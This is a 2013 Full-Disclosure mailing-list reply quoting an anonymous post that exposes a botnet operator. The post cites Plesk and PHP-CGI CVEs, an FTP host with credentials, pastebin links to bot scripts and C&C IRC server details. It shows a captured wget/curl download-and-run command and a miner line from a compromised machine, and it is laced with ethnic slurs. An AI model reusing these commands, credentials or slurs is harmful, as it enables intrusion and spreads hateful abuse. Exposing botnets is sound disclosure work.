Date: Tue, 05 Nov 2013 19:40:26 +0100
From: Alex <fd@...oo.de>
To: <pr0n4h4x@....hush.com>, <full-disclosure@...ts.grok.org.uk>
Subject: Re: Geox fails..

I would have changed his mining pool ;)


On 5 November 2013 13:22:43, pr0n4h4x@....hush.com wrote:
>
> Geox is just another annoying wannabe hacker and gypsy criminal from
> Romania. He's been around for a few years trying to impress his mom
> and his little gypsy fellas with mad hacking skillz..
> This stupid donkey is currently into teh bitcoins infecting boxes
> through well known Plesk (CVE2013-4878) and PHP-CGI (CVE2012-1823)
> bugs planting a lame bitcoin miner. Who would ever mine on CPUs.. again?!?!
> Whatever, eat shit and die you fuck*ng gypsy!
> 8============D Awes0me FTP s3rv1ng sh1t
> ftp://ftp:wer234234@...79.48.186/
>
> 8============D Awes0me to0lz o' trad3
> bot.php http://pastebin.com/9hgZ9ZUc
> winbot.php http://pastebin.com/wNDedBmU
> winbot2.php http://pastebin.com/ibfky3uR
> x.exe https://malwr.com/analysis/NzFiMTcxMmExYjU4NDdiYTllNDQ0NzcyNGY5OGUzMjA/ http://anubis.iseclab.org/?action=result&task_id=13472b0107a54b824518471e7c7b1b873
> update http://pastebin.com/FieAK7yK
> a http://pastebin.com/4PVDpkCe
> 8============D Compr0miz3d b0x
> 8769 ?        S      0:00 sh -c cd /tmp ; wget ftp://ftp:wer234234@...79.48.186/bot.php ; curl -O ftp://ftp:wer234234@...79.48.186/bot.php ; fetch ftp://ftp:wer234234@...79.48.186/bot.php; php bot.php ; rm -rf bot.php
> 6332 ?        Ssl  550:17 bash -o stratum+tcp://mine.cc.st:3333 -O geox.1:x -B
> 8============D C&C b0xez
>
> > C&C IRC Server: 67.207.134.147
> root@...aunit:/var/log/apache2# netstat -anp|grep ircd|wc -l
> 1251
> root@...aunit:/var/log/apache2# w
> 23:28:02 up 356 days,  5:18,  0 users,  load average: 3.57, 3.70, 3.65
> USER     TTY      FROM    LOGIN@   IDLE   JCPU   PCPU WHAT
> > C&C IRC Server: 67.207.128.106 (ircd.port0.org < Registered through afraid.org)
> # w
> 10:06:48 up 605 days, 17:59,  0 users,  load average: 0.00, 0.00, 0.00
> USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
> # netstat -anp|grep ircd|grep ESTABLISHED|wc -l
> 2393
> # grep -i total-securite.net ircd.log
> [Mon Nov  4 05:22:59 2013] - Connect - Geox!Geox@...al-securite.net
> [Mon Nov  4 05:23:13 2013] - OPER (Geox) by (Geox!Geox@...al-securite.net)
> [Mon Nov  4 05:26:12 2013] - Disconnect - (0:3:15) Geox!Geox@...al-securite.net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
